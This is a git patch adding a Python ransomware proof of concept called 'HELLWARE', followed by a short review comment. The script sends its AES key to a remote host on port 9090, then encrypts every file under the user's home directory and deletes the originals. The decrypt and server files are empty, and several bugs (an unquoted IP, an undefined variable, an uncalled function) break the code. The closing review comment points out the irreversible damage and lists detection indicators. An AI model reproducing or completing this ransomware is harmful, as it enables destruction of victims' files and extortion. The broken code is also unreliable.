From 5c2a4c5ab09c0782ae69a1fea97004114d438ceb Mon Sep 17 00:00:00 2001 From: hellisabove Date: Fri, 23 Aug 2024 13:00:55 +0300 Subject: [PATCH] Initial Commit --- README | 5 +++++ decrypt.py | 0 ransomware.py | 58 +++++++++++++++++++++++++++++++++++++++++++++++++++ server.py | 0 4 files changed, 63 insertions(+) create mode 100644 README create mode 100644 decrypt.py create mode 100644 ransomware.py create mode 100644 server.py
diff --git a/README b/README
new file mode 100644
index 0000000..8383a8b
--- /dev/null
+++ b/README
@@ -0,0 +1,5 @@
+# HELLWARE
+
+This is a simple ransomware POC made in python
+It is able to detect what os it is running on and encrypt accordingly
+It can send the key used for encryption and decryption to a remote server
diff --git a/decrypt.py b/decrypt.py
new file mode 100644
index 0000000..e69de29
diff --git a/ransomware.py b/ransomware.py
new file mode 100644
index 0000000..10b23df
--- /dev/null
+++ b/ransomware.py
@@ -0,0 +1,58 @@
+import os
+import socket
+import getpass
+import platform
+from Crypto.Cipher import AES
+from Crypto.Random import get_random_bytes
+from Crypto.Util.Padding import pad
+
+# We create a socket to send the encryption key to a remote server
+def send_key(key):
+ host = 192.168.0.155
+ port = 9090
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((host, port))
+ s.sendall(key)
+ print("Key sent")
+ s.close()
+
+# Function to encrypt a file and removing the unencrypted one
+def encrypt_file(file, key, iv):
+ cipher = AES.new(key, AES.MODE_CBC, iv)
+
+ with open(file, 'rb') as file:
+ plaintext = file.read()
+
+ ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
+
+ with open(file + 'hell', 'wb') as enc_file:
+ enc_file.write(iv + ciphertext)
+
+ os.remove(file)
+
+# This will go through the specified folder and encrypt all of the files, even from subfolders
+def encrypt_whole(path):
+ key = get_random_bytes(32)
+ iv = get_random_bytes(16)
+ send_key(key)
+
+ for root, _, files in os.walk(folder_path):
+ for file_name in files:
+ file_path = os.path.join(root, file_name)
+ encrypt_file(file_path, key, iv)
+ print(f"Encrypted: {file_path}")
+
+# Main function
+# Detects username, assembles path and calls function from above to encrypt
+if __name__ == "__main__":
+ username = getpass.getuser()
+ path = ''
+
+ if platform.system == "Windows":
+ path = r'C:\Users\%s' % username
+ elif platform.system == "Linux":
+ path = '/home/' + username
+ elif platform.system == "Darwin":
+ path = '/Users/' + username
+
+ encrypt_whole(path)
diff --git a/server.py b/server.py
new file mode 100644
index 0000000..e69de29
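Review bot: Nothing in this commit can restore a file the code touches: `encrypt_file` ends with `os.remove(...)` on each original, the 32-byte key lives only in memory and in the `send_key` socket write, and both `decrypt.py` and `server.py` are added empty, while the `__main__` block is written to target the current user's home directory. A proof of concept should be confined to a directory prepared for it, for example by opening `encrypt_whole` with `if not os.path.isfile(os.path.join(path, 'LAB_MARKER')): raise SystemExit('not a lab directory')` (the marker name is a constructed placeholder). The on-disk format is also undocumented; a comment in `encrypt_file` such as `# output: 16-byte IV, then AES-CBC ciphertext of the padded plaintext, written to <name>hell` would let whoever has to recover test data work from the file alone. For detection, the behaviour visible here is an outbound TCP connection to port 9090 followed by a recursive walk that writes `<name>hell` files and deletes the originals.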